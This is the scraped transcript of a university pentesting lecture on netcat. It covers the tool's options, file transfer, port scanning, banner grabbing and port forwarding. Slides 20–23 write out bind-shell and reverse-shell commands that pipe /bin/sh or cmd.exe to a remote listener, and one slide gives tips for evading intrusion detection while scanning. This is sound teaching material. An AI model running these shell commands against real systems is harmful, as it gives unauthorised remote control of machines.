Presentation is loading. Please wait.

Presentation is loading. Please wait.

COMP265 - Pentesting netcat. What? Like cat, but for networks Standard input sent over network to remote ip:port Packets from network sent to standard.

Published byRodrigo Trapnell Modified over 10 years ago

Similar presentations

Presentation on theme: "COMP265 - Pentesting netcat. What? Like cat, but for networks Standard input sent over network to remote ip:port Packets from network sent to standard."— Presentation transcript:

1 COMP265 - Pentesting netcat

2 What? Like cat, but for networks Standard input sent over network to remote ip:port Packets from network sent to standard output Low level Versatile “The network Swiss army knife”

3 Basic Operation Client mode: –Connects to specific remote port Listen mode: –Waits for connection on a port Both modes –Send Standard Input to net –Data from net sent to Standard Output Messages from netcat sent to standard Error Packets can have source routing attached

4 Netcat Command May be two letter command “nc” –Like cp and other traditional two letter unix commands –nc options hostname ports May be the word “netcat” Another variant “ncat”, from nmap project –Supports a few more options Depends on the platform, Kali has both Sometimes have to compile from source to get all options (Suse)

5 Command Options -llisten mode, for inbound connects -L"Listen harder" Persistent listener (Win only) -n numeric-only IP addresses, no DNS -p portlocal port number -rrandomize local and remote ports -s addrlocal source address -uUDP mode --sctp sctp mode -v verbose [use twice to be more verbose]

6 Command Options -i secsdelay interval for lines sent, ports scanned -tanswer TELNET negotiation -w secstimeout for connects and final net reads -z zero-I/O mode [used for scanning] These three options not available on some packages -o fileor -x file (hex) dump of traffic -e progor -c command program to exec after connect -g gatewaysource-routing hop point[s], up to 8

7 What for? Send files Telnet Backdoor Port scan Banner grabbing Reverse shell Relay (proxy) Port forward Replay

8 Arguments Host can be name or ip -n = no dns lookups, ip only otherwise full DNS forward and reverse lookup -v or -vv = verbose messages, always sent to standard error -w limits wait time, -w 3 recommended -o filename produces dump of all traffic > or < -i slows down sending, used if input from a file

9 Send Files Sender –nc -l -p 80 < file.txt –file.txt | nc -l -p 80 Reciever –nc 192.168.1.1 80 > file.txt Note use of redirect and pipe Receiver could have been a web browser | all enhance power of netcat

10 Another Example dd if=/dev/sda3 | gzip | nc -l 80 nc 192.168.17.1 80 > sda3.img.gz Or, listener can be receiver nc -w 3 -l 80 > /home.cmb.tar.gz tar -cvf - /home/cmb | gzip | nc 192.168.17.1 80

11 nc telnet cmblap:~ # telnet 192.168.17.24 25 Trying 192.168.17.24... Connected to 192.168.17.24. Escape character is '^]'. 220 fivefortyfour.com ESMTP ^C ^] telnet> quit Connection closed. cmblap:~ # netcat 192.168.17.24 25 220 fivefortyfour.com ESMTP helo 250 fivefortyfour.com quit 221 fivefortyfour.com cmblap:

12 As telnet client Netcat quits when you want it to Doesn't pay attention to standard input EOF Doesn't require escape character Less cruft Transfers arbitrary binary data Better utility for probing services Can use UDP -t responds automatically to telnet option negotiations

13 Probing? Netcat can do port scans This took around 1 sec cmblap:~ # netcat -v -w 2 -z 192.168.17.24 20-1000 jabber.fivefortyfour.com [192.168.17.24] 631 (ipp) open jabber.fivefortyfour.com [192.168.17.24] 445 (microsoft-ds) open jabber.fivefortyfour.com [192.168.17.24] 139 (netbios-ssn) open jabber.fivefortyfour.com [192.168.17.24] 111 (sunrpc) open jabber.fivefortyfour.com [192.168.17.24] 110 (pop3) open jabber.fivefortyfour.com [192.168.17.24] 80 (http) open jabber.fivefortyfour.com [192.168.17.24] 53 (domain) open jabber.fivefortyfour.com [192.168.17.24] 25 (smtp) open jabber.fivefortyfour.com [192.168.17.24] 24 (?) open jabber.fivefortyfour.com [192.168.17.24] 22 (ssh) open cmblap:~ #

14 UDP scans too These are much slower cmblap:~ # netcat -v -w 2 -z -u 192.168.17.24 20-100 jabber.fivefortyfour.com [192.168.17.24] 67 (bootps) open jabber.fivefortyfour.com [192.168.17.24] 53 (domain) open

15 Scanning Options -i –Delay interval to slow down scans -r –Randomise ports, including source -z –Send no data (TCP) or minimal data (UDP) -i and -r help to avoid ids -vv reports closed ports

16 Fancier Scan echo QUIT | nc -v -w 5 target-host 20-250 500-600 5990-7000

17 Banner Grabbing cmblap:~ # netcat -v 192.168.17.24 110 jabber.fivefortyfour.com [192.168.17.24] 110 (pop3) open +OK Hello there. quit +OK Better luck next time. cmblap:~ # netcat -v 192.168.17.24 25 jabber.fivefortyfour.com [192.168.17.24] 25 (smtp) open 220 fivefortyfour.com ESMTP quit 221 fivefortyfour.com cmblap:~ # netcat -v 192.168.17.24 22 jabber.fivefortyfour.com [192.168.17.24] 22 (ssh) open SSH-1.99-OpenSSH_4.1 quit Protocol mismatch.

18 Chat Session Just for fun Machine 192.168.17.6 –nc -l -p 1234 Machine 2 –nc 192.168.17.6 1234 Both machine's keyboard input appears on the other machine's screen Note: use -v option to solve problems that may appear

19 Web Browser echo “GET somewhere.com” | nc address 80 > page.html

20 Backdoor By routing netcat's standard output to a command interpreter, we create a remote shell cmblap:/usr/local/src/netcat-0.7.1/src #./netcat -l -n -v -s 192.168.18.8 -p 1234 -e /bin/sh Connection from 192.168.18.1:4289 cmblap:/usr/local/src/netcat-0.7.1/src # I had to dl and build to enable the -e switch Cannot pass parameters to program

21 On the other end pdlnx2:~ # netcat -v 192.168.18.8 1234 DNS fwd/rev mismatch: cmblap.fivefortyfour.com != cmblap cmblap.fivefortyfour.com [192.168.18.8] 1234 (search-agent) open df Filesystem 1K-blocks Used Available Use% Mounted on /dev/sda6 20641788 7448780 12144368 39% / udev 1540268 192 1540076 1% /dev /dev/sda2 39942856 8711724 31231132 22% /windows/C /dev/sda8 20650996 17395552 2206404 89% /home/cmb exit pdlnx2:~ #

22 More backdoors On windows: nc -L -p 1234 -d -e cmd.exe -L means listen hard –wait for connections –Not needed on unix -d means detach from process –Also not needed on linux

23 “Shoveling” a Shell Aka Reverse Shell Compromised machine cannot accept connections –Has to initiate connections because of firewall/NAT Attacker listens from outside the firewall –netcat -v -l -p 1234 Script on compromised machine starts shell then connects to attacker –netcat ip.addr 1234 -e /bin/sh Script has to run forever, or at timed intervals, or in response to some event

24 Port Forwarding Forwarding localhost port 8080 to remote host port 80 ncat -l localhost 8080 --sh-exec "ncat remote.host 80"

25 References ncat –http://nmap.org/ncat/http://nmap.org/ncat/ –User's guide is good reference http://nmap.org/ncat/guide/index.html netcat –http://netcat.sourceforge.net/http://netcat.sourceforge.net/ Don't forget the man pages

26 Lab Lab today will exercise many of these functions Due the day of the lab next week, Feb 18 –No new lab next week

Download ppt "COMP265 - Pentesting netcat. What? Like cat, but for networks Standard input sent over network to remote ip:port Packets from network sent to standard."

Similar presentations

1 Linux IP Masquerading Brian Vargyas XNet Information Systems.

1 Linux IP Masquerading Brian Vargyas XNet Information Systems.
Fred P. Baker CCIE, CCIP(security), CCSA, MCSE+I, MCSE(2000)

Fred P. Baker CCIE, CCIP(security), CCSA, MCSE+I, MCSE(2000)
Enabling Secure Internet Access with ISA Server

Enabling Secure Internet Access with ISA Server
Internet Eugen Kvasnak, PhD. Department of Medical Biophysics and Informatics 3rd Medical Faculty of Charles University.

Internet Eugen Kvasnak, PhD. Department of Medical Biophysics and Informatics 3rd Medical Faculty of Charles University.
WEB AND WIRELESS AUTOMATION connecting people and processes InduSoft Web Solution Welcome.

WEB AND WIRELESS AUTOMATION connecting people and processes InduSoft Web Solution Welcome.
1 Network Address Translation (NAT) Relates to Lab 7. Module about private networks and NAT.

1 Network Address Translation (NAT) Relates to Lab 7. Module about private networks and NAT.
SSH SSH is “Secure SHell” Secure, compressed, widely supported, fast Allows both users to get jobs done, and also allows system administrators to sleep.

SSH SSH is “Secure SHell” Secure, compressed, widely supported, fast Allows both users to get jobs done, and also allows system administrators to sleep.
Network Fundamentals – Chapter 4 Sandra Coleman, CCNA, CCAI

Network Fundamentals – Chapter 4 Sandra Coleman, CCNA, CCAI
DMZ (De-Militarized Zone)

DMZ (De-Militarized Zone)
Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions April 14, 2015 DRAFT1.

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions April 14, 2015 DRAFT1.
Backdoors A backdoor is a program that allows attackers to bypass normal security controls on a system, gaining access on the attacker’s own terms.

Backdoors A backdoor is a program that allows attackers to bypass normal security controls on a system, gaining access on the attacker’s own terms.
Pentest com script shell & Perl Cerutti – IESGF - 2014.

Pentest com script shell & Perl Cerutti – IESGF
HTTP Cookies. CPSC 441 - Application Layer 2 User-server state: cookies Many major Web sites use cookies Four components: 1) cookie header line of HTTP.

HTTP Cookies. CPSC Application Layer 2 User-server state: cookies Many major Web sites use cookies Four components: 1) cookie header line of HTTP.
Scanning Determining if the system is alive IP Scanning Port Scanning War Dialing.

Scanning Determining if the system is alive IP Scanning Port Scanning War Dialing.
Hacking Exposed 7 Network Security Secrets & Solutions Chapter 2 Scanning 1.

Hacking Exposed 7 Network Security Secrets & Solutions Chapter 2 Scanning 1.
SYSTEM ADMINISTRATION Chapter 19

SYSTEM ADMINISTRATION Chapter 19
Upper OSI Layers Lecture 10, May 7, 2003 Mr. Greg Vogl Data Communications and Networks Uganda Martyrs University.

Upper OSI Layers Lecture 10, May 7, 2003 Mr. Greg Vogl Data Communications and Networks Uganda Martyrs University.
System Security Scanning and Discovery Chapter 14.

System Security Scanning and Discovery Chapter 14.
Firewall Lalitha Jammalamadaka. Agenda 1. Introduction 2.Types of firewalls 3.How a software firewall works 4.Methods to control traffic 5.Making the.

Firewall Lalitha Jammalamadaka. Agenda 1. Introduction 2.Types of firewalls 3.How a software firewall works 4.Methods to control traffic 5.Making the.
CSCE 515: Computer Network Programming Chin-Tser Huang University of South Carolina.

CSCE 515: Computer Network Programming Chin-Tser Huang University of South Carolina.

Similar presentations

Ads by Google